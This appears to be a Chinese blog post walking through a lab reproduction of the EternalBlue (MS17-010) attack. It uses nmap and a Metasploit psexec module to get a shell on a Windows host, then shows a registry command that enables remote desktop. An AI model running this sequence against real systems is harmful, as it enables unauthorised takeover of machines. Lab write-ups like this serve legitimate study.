永恒之蓝漏洞攻击完整步骤

本文仅做漏洞复现记录与实现,请勿用于非法用途

需要设备:

kali攻击机

windows2003/windows2008被攻击机 ip:192.168.15.129

1.进行端口扫描

nmap -Pn -sV -T4 ip地址

明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作

2.漏洞脚本检测

nmap --script=vuln 192.168.15.129(ip地址)

看出ms17-010漏洞可以攻击

3.msfconsole测试

msfconsole

4.查找合适的测试漏洞的模块

search ms17-010

5.使用模块进行测试

Use 模块

use exploit/windows/smb/ms17_010_psexec

6.查看攻击模块

7.添加被攻击机ip

8.开始进行测试

这样这是攻击成功.

9.查看拿到的权限

meterpreter > ls

10.进入shell,就可以在被攻击机里进行一系列操作

写入文件,查看能否写入

echo “hi” > C:/1.txt

11.添加用户并把用户加入到管理员组(提权)

备注:如果3389端口开的情况,进行下一步,如果3389端口关闭,进行此命令开启3389端口

开启3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

12.开启完3389端口以后,就可以进行远程桌面连接

主机进行远程连接

Win+R:mstsc

输入服务器ip,用户名(刚才创建的用户名)

完整的步骤就完成了,成功拿到了所有的权限

 

  • 12
    点赞
  • 62
    收藏
    觉得还不错? 一键收藏
  • 6
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值